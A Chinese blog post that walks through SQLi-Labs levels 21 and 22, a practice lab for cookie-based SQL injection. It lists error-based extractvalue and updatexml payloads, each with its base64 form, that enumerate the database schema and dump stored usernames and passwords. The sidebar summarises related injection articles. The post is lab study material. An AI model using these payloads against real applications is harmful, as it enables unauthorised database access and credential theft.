SqliLabs Less21-22

最新推荐文章于 2023-04-30 00:23:24 发布
最新推荐文章于 2023-04-30 00:23:24 发布
阅读量428 收藏 2
点赞数
分类专栏: Sqli Labs 文章标签: 大数据 网络安全 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/125810981
版权

第二十一关

 基于单引号和括号,64位编码的密码注入

1.判断注入点

  有了20关的经验,输入爆破账户:admin密码:admin后抓包

 

 发现admin输入为YWRtaW4%3D,根据提示用64位数据解码得到YWRtaW4=,=用url编码     为%3D

2.用特殊函数extractvalue去做

  根据提示构造语句:admin') and extractvalue(1,0x7e)#  

  用64位数据编码得: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsMHg3ZSkj

  在重发器里修改uname,发送得到错误路径

 3.爆库

admin') and extractvalue(1,concat(0x7e,database()))#

 64位编码得:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSkpIw==

 4.爆表

admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

64位编码: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYSA9IGRhdGFiYXNlKCkpKSkj

 5.爆列

admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

64位编码:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZSA9ICd1c2VycycpKSkj

 6.爆数据

admin') and extractvalue(1,concat(0x7e,(select group_concat(id,username,password) from users)))#

64位编码:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMpKSkj

 

第二十二关

 双引号加64位编码的密码注入

与二十一关同样的手法,这次是加双引号

构造语句: adamin" and updatexml(1,0x7e,3)#

64位编码: YWRhbWluIiBhbmQgdXBkYXRleG1sKDEsMHg3ZSwzKSM=

 之后同21关一样,就不赘述了

xiao飞仔
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Linux下用base64命令加解密字符串
大虾别跑
10-26 1306
Linux下用base64命令加解密字符串 #加密 echo -n "admin" | base64 YWRtaW4= #解密 echo YWRtaW4= | base64 -d admin
30余种加密编码类型的密文特征分析
wangyuxiang946的博客
11-19 2万+
声明:本文只收集了30余种加密编码类型,关于他们的介绍来源于网络,重点讲的是他们的密文特征,还有很多类型没有讲到,后续等我研究明白了再发,转载请注明来源,感谢支持 MD5、sha1、HMAC算法、NTLM等相似加密类型 1、MD5——示例21232F2...
小迪渗透测试学习笔记(十七)WEB漏洞-二次,加解密,DNS等注入
萧丶的博客
02-06 836
1. 加解密注入 get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ== 加密部分:MQ== 解密结果:1 案例:sqlilabs-less21 burp抓包 forward,可以看到uname=YWRtaW4%3D %3D 为 = ,base解密为admin 将uname的值改为注入语句: admin' or updatexml(1,concat(0x7e,(database())),0)
SQL注入(2)——各种注入
realmels的博客
04-24 934
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 上一篇讲了SQL手工注入及简单的检测,今天来讲解各种类型的注入。 这里配合先前搭建好的sqli-lab进行测试 报错注入 报错注入主要是通过使数据库报错,从而获取信息。 这里报错函数主要是updatexml、ex.
WEB漏洞-SQL注入之二次加解密,DNS等注入(学习笔记)
qq_19375535的博客
07-02 490
sql注入学习笔记
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs实验指导手册
最新发布
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
CTF实战训练日志——2021-10-14(七)
热门推荐
stybill的博客
10-14 5万+
题目:利用Burp进行密码绕过 在Username中,无法输入内容,Password可以输入。 解题思路 利用Burp抓包,然后修改响应包的内容 Action -> Do intercept -> Response to this request -> Forward 分析响应包,我们会发现中的【R0pDVEY=】,这个值很明显是经过base64加密过的,解密之后,发现结果为GJCTF,这个值和Username中的一样,说明Username需要经过base64加密变成校.
sqli-labs第22关基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 468
22关基于cookie报错注入 sqlmap 方法 python2 sqlmap.py -r 1.txt --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0 手注 一、判断注入点 通过源码我们可以发现,闭合点是双引号 然后我们基于21关进行构造语句 一、猜注入点: admin " and extractvalue(1,concat(0x7e,( 1),0x7e))# YWRtaW4gI
《小迪安全》第17天 SQL注入:二次注入,加解密注入,DNSlog注入
m0_56250796的博客
04-30 244
通过 concat() 函数将查询结果和api的地址进行拼接,形成一个四级域名,然后通过load_file()函数将域名进行dns解析,然后就可以在dns平台进行查看了。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。在无法通过联合查询直接获取数据时,只能通过盲注一步步的获取数据,手工测试需要花费大量的时间,使用sqlmap等工具有很大的几率被封IP。实际情况中需要测试注入点,本题白盒测试默认已知为Cookie注入,注入点为 uname。
secret的知识
weixin_46837396的博客
03-26 1088
Secret 我们说ConfigMap这个资源对象是Kubernetes当中非常重要的一个对象,一般情况下ConfigMap是用来存储一些非安全的配置信息,如果涉及到一些安全相关的数据的话用ConfigMap就非常不妥了,因为ConfigMap是名为存储的,我们说这个时候我们就需要用到另外一个资源对象了:Secret,Secret用来保存敏感信息,例如密码、OAuth 令牌和 ssh key等等,将这些信息放在Secret中比放在Pod的定义中或者docker镜像中来说更加安全和灵活。 Secret有三种类
21-40关
bsaikfhgihwi的博客
02-08 349
第二十一关 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时候base64加密一下就可以了。 先抓包看一下: hadow_10,text_aHR0cHM6Ly9...
sqli-labs 21-28
记录一些有用的东西
12-12 234
Less-21 1.直接用我们知道的用户名密码都为:admin的进行尝试,发现: 2.发现Cookie为:uname = YWRtaW4=说明对其进行了base64编码,那就编码看看:在线编码解码 YWRtaW4=就是admin,确实是base64编码,那就是说构造的语句也要进行base64编码。 还是在Cookie中构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #编码后 uname=YWRtaW4nIGFuZCB
30余种加密编码类型的密文特征分析(建议收藏)
爱国小白帽
11-11 4万+
一、md5 一般MD5值是32位由数字“0-9”和字母“a-f”所组成的字符串,如图。如果出现这个范围以外的字符说明这可能是个错误的md5值,就没必要再拿去解密了。16位值是取的是8~24位。 md5的三个特征: 确定性:一个原始数据的MD5值是唯一的,同一个原始数据不可能会计算出多个不同的MD5值。 碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。 不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,
风云杯大学生信安大赛(Web部分题解)
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7题,第8,9题见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本题考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
base64的使用方法
m0_69287945的博客
08-03 3092
Base64可以对任意的二进制数据进行编码
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值